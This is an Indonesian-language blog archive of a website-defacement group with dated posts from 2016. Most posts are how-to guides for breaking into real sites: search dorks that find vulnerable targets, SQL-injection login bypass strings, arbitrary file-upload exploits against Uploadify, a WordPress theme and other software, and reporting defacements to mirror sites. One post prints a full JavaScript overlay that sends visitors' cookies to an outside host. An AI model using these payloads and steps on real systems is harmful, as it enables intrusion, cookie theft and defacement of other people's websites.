Thanks For Support Us Don't Forget Us In Your Heart And Your Mind

Copyright © Sorry We're Closed | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

Visitor Counter

Trustmark

Facebook


Selamat Datang Di Bagian Intelligence Gathering Garuda Security Hacker

Dengan Mengakses Laman Ini Berarti Anda Setuju Bahwa Setiap Dampak Dan Resiko Penyalahgunaan Konten Ditanggung Oleh Anda Sendiri

Informasi di Tiap Laman Akan Terus diupdate secara berkala

Tuesday, December 27, 2016

Deface CMS RaphSoft With Add News


Yups Kembali lagi dengan saya :)
Sebelum nya si Viona666 member baru GSH nemuin Bug " RaphSoft "Dengan Bypass Admin di tutorial saya.  ntah kaya nya masih banyak web make CMS ini coba aja satu satu karena baru nemu , Karna dia gak mau makan semuanya wkwkwk.

Dork :
- inurl:/admin/index.php intitle:Control Panel
- intitle:"RaphSoft" inurl:/admin
- user your brain , karna baru nemu

Ciri ciri web nya
Tinggal masukin User PW : '=''or'

Add News

Klik Source Dan Masukkan Script Deface Kalian :)

Jedorrrr






Demo  | Mirror
Defacer.ID OK




Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Monday, December 26, 2016

Tips Mencari Tempat Upload File Bersama Akses Filenya Sekaligus


FANS AQU

Baiklah para member tersayang , hacker, fans dan haters and satu lagi tukan Report, kali  ini ane E7B_404 Akan Memberkan sebuah Tips membuat oogle dork untuk mencari file upload(tempa Uploaad) dan anda tidak perlu mencari aksesnya karena dork saya ini sudah sekligus akan menemukan tempat uploadnya. ni dorknya saya kasih satu saja, selebihnya berfikir jngan jadi anak manja oke.

- intext:"Uploads/"+"Upload.html"+"Index Of"

nah itu dorknya : Penjelasan
 Uploads/ : Ini akan jadi nanti Akes kita Untuk mencari sebuh file kita
 Upload.html : dan ini dl tempat uploadnya, nanti 
(gunakan Otk Kalian Selebihnya oke)
Sekn tips singkat gu E7B_404, akun fb gua ada yang report lagi dah 7 akun ilang di begal, apa salahku ?? :(
ya udah bye bye teman teman, next  see you again



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Loyo-ID | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Sunday, December 25, 2016

Deface Dengan Upload Button


Halo gaes .
Saya akan Sharing Tutorial Deface Dengan Upload Button. Yups Old But Gold untuk Newbie xixixi

langsung saja

Bahan :
-Dork
-Jomblo
-Skill
-Sabar
-Script Deface
-Koneksi Internet

Pertama :

Kalian Dorking Dengan 
inurl:/examples/uploadbutton.html << Bisa di kembangkan menurut imajinasi lo




Pilih Salah Satu aja , gak semua itu web bisa di upload .html
Saya Pilih Bawah Sendiri

Kedua :
Masuk aja Nanti Ada uploader seperti gambar di bawah


Kalian Klik Button Upload , Dan Masukkan Script Kalian

Ketiga :
Nanti Hasil url Script nya akan nampak seperti gambar di bawah


Akses Hasil Deface nya
www.webnyatadi.co.li/url yang kalian dapet tadi
atauwww.webnyatadi.co.li/[path]/url yang kalian dapet tadi
Contoh Seperti Punya saya


Demo : Kesini Onii-chan

Sekian Tutorial nya :) , See You Next Time.

Tidak Ada Yang Tidak mungkin  Selagi Kita Berusaha


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Sector.V2 Berbagi Pengalaman


Sebelum nya saya Re-Post Punya mas _Tuan2Fay_

Pahit Manisnya Pengalaman di Dunia Cyber.

Di sini saya jelasin dikit , Sebagai Newbie di GSH saya cuman Editor Foto doang , gak bisa apa"
Manis nya itu Sejak bisa Deface , di situ saya mulai mempunyai banyak teman + sama team Trenggalek Cyber Army. Tiap Hari ngegame Pindah Jadi Defacer xixixi.
Dan saya mulai penasaran , Pas Booming nya Situs KPAI di deface. Saya pengen bangen bisa bobol gituan , alhasil saya pertama" bisa deface menggunakan Method Webdav. Dan saya makin belajar agak dalam lagi , saya mikir " Kok bisa sih Orang ini Deface web ini , Kok Bisa Bobol web ini " itu di pikiran mu Berkata , Cara nya gimana coba..? , waktu noob noob nya saya gak tau apa apa xixi
dan Berlanjut ke Method SQLi Injection , Saya Mendapat Guru dan Sekaligus CEO Trenggalek Cyber Army , di situ pas belom rame rame nya yah, Yang Aktif aku sama Noval TCA a.k.a Noval Vhost , di ajarin banyak dan akhir nya ketemu Yukinoshita47 . Yups Admin GSH sekarang :) .
Dan saya Mengangumi dia , Weaboo Tapi Bisa pepes wkwkw.
dan saya mulai Stalking GSH, scrool kebawah blog nya ada open member, dan saya gabung , agak lama di ACC , dan agak kenal sama Admon Tampan Yukinoshita47, Dan Wuuss Selamat Tinggal Trenggalek Cyber Army ( Script ku masih ada nama tim mu , walaupun di script mu gak ada nama ku )
Yalah Semenjak Saya masuk GSH cuman jadi Edit Edit Foto :D , Mental saya down ketika orang" menjauh dari saya ( ya mungkin cuman ada butuh nya doang , temen musiman )
dan admin admin di mari pada Hibernasi , yang mirroring sempet dikit T.T , saya berfikiran Pengen Pindah Team , Kenapa sih kok pindah pindah mulu ?? , Bukan nya saya Menghianati , tapi saya Haus Akan Ilmu :) . dan join team sana sini gak nemu . dan Akhir nya Saya Stalk FP GSH.
Ketika aku liat Rate Orang

nah saat liat rate itu , saya jadi UP lagi hehehe..
Segini aja , kalo di post semua gak Muat , Jalan Ceritaku banyak xixixi.

Kenapa Bisa Cepat Berkembang ?

Belajar Tanpa Mengeluh Adalah Jalan Kesuksesan ( Janc*k Sec )
saya mulai memegang kata kata itu, Saya Mencoba Mengambil POC laen , dan di kombinasikan sama Imajinasi.
No Army Can Stop Our Idea ( Garuda Security Hacker )
Nah inti nya kalo belajar jangan menyerah , walaupun saya sempet menyerah , tapi inget saya pengen bisa , nah harus ada usaha pasti nya hehehe.
Let's Play With our code And Make More Exploitations ( IndoXploit ) Selain belajar deface , Sisihkan Waktu untuk Belajar Koding kek , Memahami php , html / dsb. Jangan pernah minta instan , Gunakan Sedikit Otakmu , Biar gak mati LUL Segitu aja yah , masih banyak asli nya bisa tanya tanya kok.

Menolak orang yang minta di ajarkan.

setelah saya buka chat lama saya total ada 50++ pesan belum kebaca
sorry ya , Saya Sector.V2 kalo marah marah aja , saya minta maaf
Saya bukan nya gak mau Ngajarin , bisa di karenakan
- Bad mood
-gak suka bergaul sama orang gak kenal
- Temen ku sedikit gak banyak"
-Gak Cocok Jadi Guru
Bonus ++

segitu aja , masih banyak juga asli nya.

Kesimpulan :
hhmmm.. Berusaha tanpa menyerah , Belajar -> Praktek -> Kembangkan , Jangan Terlalu memBacot " Tong kosong Nyaring Skill nya "
Sekian dulu , Mungkin ini Terakhir kali aku Nongol di Blog ini.
Karna tahun Depan Sibuk Magang , Sorry banget buat yang pada balik di tahun depan , saya gak sering sering nongol.

Last Show Off , Hidupku Selalu salah , sudah tidak ada teman , di Grup pun Di Kick :)
Sorry buat admin sini , Posting ini memang nyampah , tapi saya pengen Berbagi Pengalaman kaya _Tuan2Fay_ juga.

See You Again

No Army Can Stop our Idea | Keep Silent And Hidden


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Saturday, December 24, 2016

Download 5 Ebook Hacking Free



 Hello, Kali ini admin kece badai akan share ebook hacking untuk kalian yang suka hacking, ebook ini menjelaskan bagaimana seorang hacker berfikir, berimajinasi dan exploit, sayangnya beberapa ebook berbahasa Inggris, jadi pake google translate saja yahk :). Berikut Link Downloadnya Di Bawah Ini :

1000 Trick Hacking 
 -  Seni Googling
Belajar Metasploit
[DOWNLOAD
Buku Sakti Hacker
Passwordnya : gustonur-it.blogspot.com
Xss Attack Exploit And Defense 

Bonus Ebook Dari Saya : Belajar Backtrack Full [ DOWNLOAD ]  passwordnya : engginer-system.blogspot.com 
Berikut Beberapa Ebook Buat kalian semua, jika ada link error silakan ke fanspage kami, :) salam hangat God Bye.

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Tuesday, December 20, 2016

Deface Easy File sharing web server Vulnerability File Upload


 posting tutorial lagi ahk, mumpung dah beres download Hentai dan JAvnya kwkw,
kali ini akan post tutorial Deface Easy File sharing web server Vulnerability File Upload cukup perhatikan tutorialnya dan action deh, lagsung sajah.

 Dork yang pasti:
  • inurl:upload.ghp
  • dork banyaknya Lihat Disini  
exploitnya :
  • site.com/path/upload.ghp
step demi stepnya langsung sajah beb.
pastekan dorknya di google pilih target yang ingin di tusbol masukin exploitnya, nanti tampilannya akan ada tempat upload seperti gambar di bawah.

 tuh ada tempat uploadnya tinggal upload deh script andalan kalian file yang allowed: .php .phtml .html dll
kalo dah di upload nanti akan ke otomatis ke temap file kalian di taru, lihat gambar hentainya -_-.

 tuh ada file yang tadi aku upload, kalo dah gini ya tinggal klik ajah file lu dan tara.

 deface gue sukses :V, eh backgroundnya keren kn wkwkwk, artis JAV. sekian tutorial nya silkan praktekan dengan sabun  masing2 dn coli, wkkwk. sampai jump di tutorial selnjutny dengan admin paling kece badai ini :) :*

Thanks To :
Bapa Ibu Guru Yang Udah Pulangin sekolah setengah hri doang jadi bisa posting :D

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | Loyo-ID And All Member of Garuda Security Hacker

Cara Mendapatkan Username Dari Error Log Website


E7B_404
Hallo, mumpung lagi bebeas sekolhnya jadi langsung ke warnet buat download Hentai wkwk, buat share tutorial but kalian para hacker, sekarng saya akan shre tutorial ringan cara mendapatkan Username dari error Log, bingun ?  simak sajah tutornya,
Pertama Hanya Cukup menggunkan Dork di bawah ini :
  • intitle:"Index Of/" intext:"error_log"
  • untuk dork lainnya Lihat Disni
Step Demi stepnya, pastekan google dorknya, pilih situs yang ingin di mbil usernamenya, nanti tampilannya akan seperti fromcat, atau bnyak teks kalian tinggal lihat sebelum /public_html/ atu lainnya karena berbeda beda yang jelas sebelum homenya :V, seperti gambar berikut:

 nah lihat itu seperti contoh :  /usr/home/muji/jurnal/favicon.ico nah dan Muji adlah adalah usernamenya, mudah kan, kalo mudah sekian turuorialnya, ngak semua ada usernamenya di error Log,
by bye saya admin pling kece di GSH. :*


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | Loyo-ID  And All Member of Garuda Security Hacker

Monday, December 19, 2016

Tutorial Deface Themes RightNow WordPress Upoadify



Hallo, Sekarang saya akan sare deface Metode Themes WordPress Themes RightNow,
mumpung lagi d net, dan lagi nyantai admin akan share secara detail step by stepnya :), langsung saja siapain bahan bahannya :

Dorknya :
  • inurl:/wp-content/themes/RightNow/ 
  • inurl:/wp-content/themes/RightNow/includes/
  • Index Of intext:themes/rightnow/
  • Selebihnya gunain otak Bokeper :V
Exploitnya :
  • site.com/wp-content/themes/RightNow//includes/uploadify/upload_background_image.php
 Vuln :
  • akan blank
Csrf :
  •  csrfnya dah di siapin Disini (Csrfnya Bang Kazuto, dah Ijin sama Bang Ferdi:*
 okke dah siap alatnya langsung ke step by stepnya :

pastekan di google dorknya. nanti akan muncul banyak situs yang memakai themes RightNow.

 Pilih target yang baik dan perawan tentunya :D, kalo dah pilih targetnya masukin exploitnya, dan jia blank maka itu Vuln seperti gambar berikut.


Nah kalo vuln akan Blank, sekarang tinggal menuju ke crsf nya Disini .
di koom pertama masukin site targetnya, di kolom kedua masukin tipe datanya Filedata . seperti contoh.

 klik targeted, dan upload sell, atau script deface kalian, jika berhasil akan muncul angka 1, lihat gambar.


 Na itu tandanya berhasl sekarang tinggal aksesnya ?? aku kasih tau kok beb :*,
site.com/wp-content/uploads/galleryimages/
dan cari file kalian disana, karena namanya kan acak, kalo ketemu yah klik dan deface sukses, berikut defacean admin.

 Sekian Tutorial kali ini, dan see you di next tutorial bersama admin paing kece :* :)

Thanks To :
  • Garuda Security Hacker
  • Kazuto Dan Ferdi ( Atas Csrfnya )
  • B. Yun ( Guru Algorima ku :)  )
  • Sulis atas .. ahk sudalah :*
Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | Loyo-ID | FazLast |  D34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Sunday, December 18, 2016

Deface Metode Uploader Japan New Dork


Deface Mulu
 hallo, dah tau kan deface metode File Uploader japan ?
nih baca disini : Deface Metode File Uploader Japan nah sekarang saya akan share dorknya yang fresh dan Tutorialnya, dah siap ?
Pertama Siapin Dulu Dorknya
  •  "uploader"ext:cgi
  •  site:jp "uploader"
  •  uploader inurl:print.cgi
  •  Untuk dork lainnya lihat Disini
 Kalo dah siap tinggal masukin dorknya ke google
Pilih Targetnya dan akan ada temapat upload file :
Beda Website Beda Tampilannya
beda site beda tampilannya,yang jelas akan ada temapt uploadnya, tinggal upload deh sript sobat, kalo dah di upload klikfile agan dan nanti akan ada seperti gambar di bawah ini.

Klik sseperti yang di tunjukian panah nanti akan muncul hasil defacean agan, seperti punya saya

 Tuh lihat sukses defacenya, kalo dah gini gimna ??
ya submit ke Mirror lah, dan sukses di mirror, seperti punya saya ini.

lihat sukses kan masuk mirror. cepet embat buruan sebelum di deface orang lain.

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | Loyo-ID | D34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Deface Metode Pukiwiki Create Page


Deface Mulu
 Hallo,  selamat pagi kawan, dah bangun tidurnya? dah Adus dulu :V
akhirnya bisa posting lagi di blog Garuda Security Hacker, yang saya banggakan, dan kali ini admin akan share poc hasil riset E7B_404 yang akan di publikasikan buat kalian para hekel indonesia,
berikut Tutorialnya sudah di jadiin dalam Vidio biar mempermudah anda memahaminya:)
Dan untuk Dorknya : Disini



 Jika Kurang paham silkan tanyakan di komentar, atau ke fanspage kami, happy deface:)
Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Loyo-ID | Sector V.2 | Mr.Spongebob | CyberGhost.17  FazLast | And All Member of Garuda Security Hacker

Wednesday, December 14, 2016

Bypass Admin With Email


Hallow Gans :*
Oke saya akan posting lagi.

Pertama nya saya coba coba , Lalu saya ketagihan .

Imajinasi Bokep mu gak akan menghentikan Imajinasimu 


Bypass admin email , gimana sih cara nya ? cuman nambahin @gmail.com / @yahoo.com dll

contoh seperti web berikut :



Nah di situ saya menggunakan user : '=''or' password : '=''or'
tapi di situ harus ada tanda @
kita cuman nambahin @gmail.com / @yahoo.com / terserah
user : '=''or'@gmail.com
pw : '=''or'


nah liat ss berikut :


Dooorrrr :*


NOTE : Tidak Semua Web Bisa diginiin .
Salam Gans :*



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Saturday, December 10, 2016

Tutorial Deface Dengan Bypass Admin With JS Overlay


Hello Hello , kemaren tuan2fay bingung gak ada yang post di blog GSH :(
oke deh , mumpung lagi free aku kasih tutorial :)

Tutorial Deface Dengan Bypass Admin With JS Overlay


Dork :
inurl:/admin/index.php
inurl:/admin/login.php
inurl:/administrator/index.php
inurl/administrator/login.php
bisa kalian tambahkan intitle:admin / login site:.co.li

Oke Selanjutnya kita buat Catetan di pastebin , Buat JS Overlay nya

/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Pwnd Gasai47"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://66.media.tumblr.com/ae95f10220dc9965b718b6966606d6cf/tumblr_n1yxvxZNgo1t014gho1_500.gif";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("You Lose , Zuhahahaha");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('You Lose , Zuhahahaha');
}
if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('Yoshioka in Your Heart');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://sholihahlooks.com/sector.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://sholihahlooks.com/sector.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}
kalian buat new paste , lalu paste kan script di atas
warna merah : buat alert
warna biru : link deface kalian / bekas / mirror , untuk menutupi halaman yang kita JS Overlay
nah kalo udah buat silahkan dorking

Nah kalo udah nemu target kita bypass , tidak semua web bisa

username : '=''or'
password : '=''or'


Kita Tambah Konten  / Kategori / apa yang bisa kita post di web tsb.

nah tadi udah buat pastebin kan ? nah di sini kita gunain :)

kalian klik raw di pastebin kalian

nah keluarnya gini , sekarang kita tambah java script :)
ex :
<script type="text/javascript" src="http://pastebin.com/raw/jnspgP0M"></script>

warna merah ganti link pastebin raw kalian :)


Jedooorrrr!!
demo < kalo udah di patch jgn salahin hehe





Tidak ada yang tidak mungkin selai kita belajar , mengembangkan , kreasi sendiri lebih baik
kacang tidak lupa kulit nya lebih indah :)


Mirror ?
Defacer.ID - OK
Zone-H - OK
Zone-Deface - OK

Thanks to LinuxSec <3

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Tuesday, October 18, 2016

Deface Uploadify Arbitrary File Upload (New Dork)

 Deface Uploadify Arbitrary File Upload (New Dork)

Deface Uploadify Arbitrary File Upload (New Dork)

 Garuda Security Hacker - _Tuan2Fay_ comeback :v.. pada kangen kaga sama gw ..
yosh karena kesibukan di dunia nyata ane sempet mutusin buat vakum semenetara.. tapi kaga usah khawatir ane blik lagi kok.. Leppy ane juga lagi bermasalah harus format hardisk.. ini aja ngetik pake PC Warnet :v
Kali ini gw bakal share tentang uploadify lagi nih... karena ane males ngetik tapi bahan nya udah ane siapin kok...

yg blm tau gmna cara deface dengan teknik Uploadify silahkan baca dlu tutorial sebelumnya : Tutorial Deface Dengan Teknik Uploadify

Bahan-Bahan :

Untuk bahan bahannya ane siapin dan ane upload ke web acak2an ane :v
( Klik Di Mari )

Kita pasti butuh CSRF ane juga udah siapin..
Script CSRF ( Klik Di Mari )
1. Buka notepad kamu..
2. Copy kode CSRF nya ke notepad kamu.
3. Ganti site target kamu
4. save dengan format html
5. buka CSRFnya setelah itu pilih file terus upload deh 


Baca Juga : Tutorial Deface Dengan Teknik Uploadify


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Sunday, October 16, 2016

Belajar PHP dan Cara Menggunakan Method POST

Hallo Bro , Evelyn Sama Back :)
Oke Dari Pada Basa Basi Langsung ke inti nya aja :)
Seperti biasa saya Sedikit Berbagi Sedikit Ilmu saya :)
Mungkin ini bermanfaat bagi agan agan , hehehe...

Defacer Mulu Bro ?
Kapan Kamu Lengkapin HTML mu Dengan CSS ?
Kenapa Saya Buat Kata" itu , ya Karena Because.
hehehe :D
Langsung Sedot Saja Bro
Ya mungkin itu saja yang bisa saya Bagikan Untuk Agan-agan :)
Dan Maaf , Blog GSH Sekarang Jarang Update , Karena Semua Pada Sibuk Dengan Urusan Dunia Nyatanya :) 

CopyRight : Guru ku :* ( iG Langsung Follow sj bosku )

Salam Tampan & Keep Stay COOLy

Sunday, October 2, 2016

Belajar Membuat WEB Dinamis dengan CSS



Hallo Gays.. oke sesuai judul , ntah mungkin ini menyerupai web dinamis :) Bisa di edit kok mau di tarus Script Deface Kalian lebih keren juga bisa
Jujur saya kalo liat script deface gak karuan itu pengen nabok orang na :) Cekidotz ja y Link Download Bahan Nya : Touch My Oppai Onii-Chan Di situ sudah di siapkan images sebagai bahan nya , bukan untuk coli! nah kalian nanti buat folder baru aja , nanti images itu copy ke folder kalian , di sana ada chap 1 - chap 3 :) Kalian di ajarkan membuat web dinamis itu.. #ASK A: Gan biar script deface keren make ini bisa gk ? B: Bisa gan , pokok nya kamu ngerti dasar HTML itu mudah kok A: gan background ane kok gak fix sih ( gak full BG di PC 14inc / 16inc <gede ini layar nya ) B: ini script nya

#SCRIPT FIX BACKGROUND

<style type=text/css>
body {
background-color:black;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
</style>

Wes Udahan segitu aja dulu ya :)
Re-Share ? Pliss Sertakan Sumber ya , Saya Sekolah Bayar Loh SPP nya :)
Credit Bu Yanuar (Guru Web ku ) Re-Share By Me XFear
#See You Next time :)

Thursday, September 29, 2016

Fake Admin Log - Honeypot By Yukinoshita47


Halo Gays...
Maaf Jarang Post , Banyak Kerjaan di REAL Life :)
Oke Langsung sikat aja , Seperti Judul Di Atas
Ini Asli Buatan Adm00n GSH , Bukan Dari Orang Homo" Laen Nya..
Fake Admin Log Honeypot Coded By Yukinoshita47  Recoded By Jurdy Kun
Cocok Untuk Ngibuli Para Defacer Defacer HOMO ...
Script Bisa Di Edit Sesuka Kalian :)
Copas ? Sertakan Sumber ya :) 


Screen Shot :



Demo : Touch Me Anata

Segitu aja Dulu ya :D
Silent Rider guud , tak berskill , tapi homo <3

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | And All Member of Garuda Security Hacker

Facebook

Followers

Cari Konten Blog

Motivasi Kami Sepanjang Masa

Motivasi Kami Sepanjang Masa

Featured

Popular Posts